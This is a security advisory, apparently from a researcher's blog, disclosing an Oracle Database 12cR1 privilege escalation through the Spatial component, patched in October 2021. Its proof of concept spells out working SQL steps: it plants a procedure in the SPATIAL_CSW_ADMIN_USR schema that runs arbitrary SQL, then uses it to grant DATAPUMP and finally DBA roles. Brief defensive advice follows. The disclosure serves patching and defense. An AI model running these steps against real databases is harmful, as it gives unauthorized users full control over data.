Title: Oracle Database Privilege Escalation Through Oracle Spatial Component
Product: Database
Manufacturer: Oracle
Affected Version(s): 12.1.0.2
Product: Database
Manufacturer: Oracle
Affected Version(s): 12.1.0.2
Tested Version(s): 12cR1
Risk Level: High
Solution Status: Fixed in Oracle Critical Patch Update October 2021
CVE Reference: N/A, Backported in Oracle CPU OCT 2021
Author of Advisory: Emad Al-Mousa

Overview:

Privilege Escalation is a famous security vulnerability (explitation technique)..... attackers seek to compromoise IT systems for multiple objectives such as data exfiltration, cause outage,....etc.


*****************************************
Vulnerability Details:

The following is a privilege escalation vulnerability where an attacker can escalate his/her account permissions to "DBA" role. DBA role in Oracle is a very powerfull role where the user can view & edit any data within the database, create database objects (tables,malcious code,....etc) and many other harmful activities. The vulnerability exists IF the database system has Oracle "Spatial" component is installed. This vulnerability existed in Oracle 12cR1 and backport fix was issued in October 2021.

To check if Oracle Spatial Component is installed, run the following SQL query as it will list ALL installed components within the database system:

SQL> select comp_name from dba_registry;


*****************************************
Proof of Concept (PoC):

// I will create an account called ironman using SYS account, the account will be granted “create session” to connect to the database and “create any procedure”, and “execute any procedure” permissions:

sqlplus / as sysdba

SQL> create user ironman identified by iron_123;

SQL> grant create session to ironman;

SQL> grant create any procedure to ironman;


SQL> grant execute any procedure to ironman;

SQL> exit;

// I will now connect using the newly created account “ironman” using sql plus

sqlplus ironman/iron_123

SQL> show user

USER is “IRONMAN”

SQL> select * from session_roles;

no rows selected

SQL> create or replace procedure SPATIAL_CSW_ADMIN_USR.hulk (SQL_TEXT IN VARCHAR2) as

BEGIN

EXECUTE IMMEDIATE (SQL_TEXT);

END hulk;
/


SQL> execute SPATIAL_CSW_ADMIN_USR.hulk('grant DATAPUMP_IMP_FULL_DATABASE to ironman');


SQL> select * from session_roles;

no rows selected

SQL> set role DATAPUMP_IMP_FULL_DATABASE;

// ironman account is escalated to the role DATAPUMP_IMP_FULL_DATABASE

SQL> select * from session_roles;

ROLE

——————————————————————————–

DATAPUMP_IMP_FULL_DATABASE

EXP_FULL_DATABASE

SELECT_CATALOG_ROLE

HS_ADMIN_SELECT_ROLE

HS_ADMIN_ROLE

HS_ADMIN_EXECUTE_ROLE

EXECUTE_CATALOG_ROLE

IMP_FULL_DATABASE

8 rows selected.

// the next escalation level is to DBA role !!

SQL> grant dba to ironman;

SQL> set role dba;

SQL> select * from session_roles;

ROLE

——————————————————————————–

DBA

SELECT_CATALOG_ROLE

HS_ADMIN_SELECT_ROLE

HS_ADMIN_ROLE

HS_ADMIN_EXECUTE_ROLE

EXECUTE_CATALOG_ROLE

DELETE_CATALOG_ROLE

EXP_FULL_DATABASE

Advertisements
Report this ad

IMP_FULL_DATABASE

DATAPUMP_EXP_FULL_DATABASE

DATAPUMP_IMP_FULL_DATABASE

ROLE

——————————————————————————–

GATHER_SYSTEM_STATISTICS

SCHEDULER_ADMIN

XDBADMIN

XDB_SET_INVOKER

JAVA_ADMIN

JAVA_DEPLOY

WM_ADMIN_ROLE

CAPTURE_ADMIN

OPTIMIZER_PROCESSING_RATE

EM_EXPRESS_ALL

EM_EXPRESS_BASIC

22 rows selected.

--- Conclusion:

The account ironman has been successfully elevated to the “DBA” role which is the highest database role in Oracle database system.


*****************************************
- Defensive Techniques:

configure auditing to catch any privilege escalation attempts.
review database account permissions on regular basis.
ensure database accounts have strong passwords, and rotate passwords regularly if possible.
perform VA (vulnerability assesment) scans on regular basis.
pro-actively patch your systems and database systems.


*****************************************
References:
https://www.oracle.com/security-alerts/cpuoct2021.html
https://databasesecurityninja.wordpress.com/2021/10/22/oracle-database-privilege-escalation-through-oracle-spatial-component/comment-page-1/

Credit:
Security-In-Depth Contributors: Emad Al-Mousa